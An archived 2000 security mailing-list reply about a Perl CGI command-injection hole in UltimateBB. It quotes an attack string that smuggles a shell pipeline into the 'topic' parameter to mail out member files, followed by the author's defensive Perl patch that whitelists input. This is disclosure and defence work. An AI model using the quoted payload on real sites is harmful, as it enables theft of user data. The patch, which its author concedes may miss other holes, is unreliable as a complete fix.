Re: perl-cgi hole in UltimateBB by Infopop Corp.

From: Jordan Ritter (jpr5at_private)
Date: Tue Feb 15 2000 - 17:47:40 PST

Next message: Charles Capps: "Re: perl-cgi hole in UltimateBB by Infopop Corp."

Previous message: Andrew Danforth: "Re: perl-cgi hole in UltimateBB by Infopop Corp."
Maybe in reply to: Sergei A. Golubchik: "perl-cgi hole in UltimateBB by Infopop Corp."
Next in thread: Charles Capps: "Re: perl-cgi hole in UltimateBB by Infopop Corp."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Mon, 14 Feb 2000, Kevin Hillabolt wrote:

# It works on the full version also...
#
# Little different syntax:
# topic=012345.cgi|cat%20../Members/*|mail hackerat_private|
# (note the ../ on the Members.  You have to go up a directory to get the
# file.  Maybe you could stop it via simple folder permissions??)

Provided with no warranty.  unescape() borrowed from the far superior
CGI.pm.  It appears to work, but I haven't checked it for completeness.
The ubb scripts are a programming disaster, and pass around metachars and
filenames through form parameters, making input validation difficult.
The patch below selectively validates input based on the name of the
variable we're validating (i.e. only certain variables are dangerous;
others are just dumb and not a risk).  It's better to try and validate at
the top leven then code review the source and try to patch every idiotic
mistake that was made.  At the very least, this stops the specific attack
that was posted.  There could be other holes that this doesn't cover, or
alternative ways to carry out the same attack.  Hopefully Infopop will get
their act together soon.

I can't believe they distribute this crap as commercial software.
Actually, what I can't believe is how many people paid for it.  God help
us all.


--jordan


$ diff ubb_library.pl ubb_library.pl.orig
84,93d83
< # unescape URL-encoded data
< sub unescape {
<     shift() if ref($_[0]);
<     my $todecode = shift;
<     return undef unless defined($todecode);
<     $todecode =~ tr/+/ /;       # pluses become spaces
<     $todecode =~ s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;
<     return $todecode;
< }
<
1047a1038
>
1112,1120d1102
<       # clean input
<     if ($key =~ /^(forum|topic|number|replynum)$/i) {
<         my($newval) = &unescape($val);
<
<         if ($newval !~ /^([ -\@\w.]+)$/) {
<             $val = "bad_input";
<         }
<     }
<
1266,1284d1247
<
< my(@out);
< foreach $row (@in) {
<     my($name,$value) = split ("=", $row);
<
<     if ($name =~ /^(forum|topic|number|replynum)$/i) {
<         my($newvalue) = &unescape($value);
<
<         if ($newvalue !~ /^([ -\@\w.]+)$/) {
<             $value = "bad_input";
<         }
<
<         push @out, "$name=$value";
<      } else {
<         push @out, $row;
<      }
< }
<    @in = @out;

Next message: Charles Capps: "Re: perl-cgi hole in UltimateBB by Infopop Corp."
Previous message: Andrew Danforth: "Re: perl-cgi hole in UltimateBB by Infopop Corp."
Maybe in reply to: Sergei A. Golubchik: "perl-cgi hole in UltimateBB by Infopop Corp."
Next in thread: Charles Capps: "Re: perl-cgi hole in UltimateBB by Infopop Corp."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:35:17 PDT